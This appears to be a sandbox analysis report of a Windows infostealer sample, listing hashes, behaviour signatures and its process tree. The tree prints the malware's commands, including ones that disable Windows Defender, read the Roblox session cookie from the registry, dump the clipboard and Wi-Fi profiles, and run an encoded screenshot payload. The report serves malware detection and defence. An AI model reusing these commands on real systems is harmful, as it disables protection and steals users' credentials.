Analysis

  • max time kernel
    93s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-01-2025 02:01

General

  • Target

    006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe

  • Size

    7.5MB

  • MD5

    17e85e39754db87356121c00e17d3096

  • SHA1

    ab01140ebc61d625989f842eb2db9bdc79c15444

  • SHA256

    006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4

  • SHA512

    40e90e9148f1442b9a74d6f31febf0aa6a9d1e7761e6b7d2b2f340f6ece456386ae5abd991ca5c09fd610e0947357f677ce24756e0b906a26be8dd74f2914a3a

  • SSDEEP

    196608:HsunqZzwfI9jUC2XMvH8zPjweaBpZ0cX2ooccXK7oSr:/BIH2XgHq+jq93Yoa

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe
    "C:\Users\Admin\AppData\Local\Temp\006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1092
    • C:\Users\Admin\AppData\Local\Temp\006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe
      "C:\Users\Admin\AppData\Local\Temp\006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4648
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4240
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3688
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2296
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4976
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3108
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()"
          4⤵
            PID:4620
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3976
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3216
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2924
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3004
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3540
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:3644
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4664
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:2744
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2636
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:5076
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3288
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:4160
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏    .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1500
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏    .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:5092
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4044
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:1328
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2580
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4448
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2356
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:3852
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                PID:2516
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4660
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:4568
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:224
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:3048
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:4864
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                      3⤵
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:3580
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profile
                        4⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:2952
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                        PID:1844
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:2532
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                        3⤵
                          PID:3240
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4792
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\itko25x2\itko25x2.cmdline"
                              5⤵
                                PID:2292
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D0B.tmp" "c:\Users\Admin\AppData\Local\Temp\itko25x2\CSC7E7E93058FEE470C90A6A6F18FF78DBB.TMP"
                                  6⤵
                                    PID:1736
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:4140
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:2044
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:2636
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:4160
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:1532
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:1032
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:208
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:772
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:5044
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:472
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                  3⤵
                                                    PID:768
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2696
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                    3⤵
                                                      PID:4928
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1748
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "getmac"
                                                      3⤵
                                                        PID:1504
                                                        • C:\Windows\system32\getmac.exe
                                                          getmac
                                                          4⤵
                                                            PID:2728
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI10922\rar.exe a -r -hp"Cribry10" "C:\Users\Admin\AppData\Local\Temp\iYEXn.zip" *"
                                                          3⤵
                                                            PID:2440
                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI10922\rar.exe
                                                              C:\Users\Admin\AppData\Local\Temp\_MEI10922\rar.exe a -r -hp"Cribry10" "C:\Users\Admin\AppData\Local\Temp\iYEXn.zip" *
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:3712
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                            3⤵
                                                              PID:2292
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic os get Caption
                                                                4⤵
                                                                  PID:2596
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                3⤵
                                                                  PID:3132
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic computersystem get totalphysicalmemory
                                                                    4⤵
                                                                      PID:2068
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                    3⤵
                                                                      PID:3236
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic csproduct get uuid
                                                                        4⤵
                                                                          PID:3496
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                        3⤵
                                                                          PID:444
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                            4⤵
                                                                            • Command and Scripting Interpreter: PowerShell
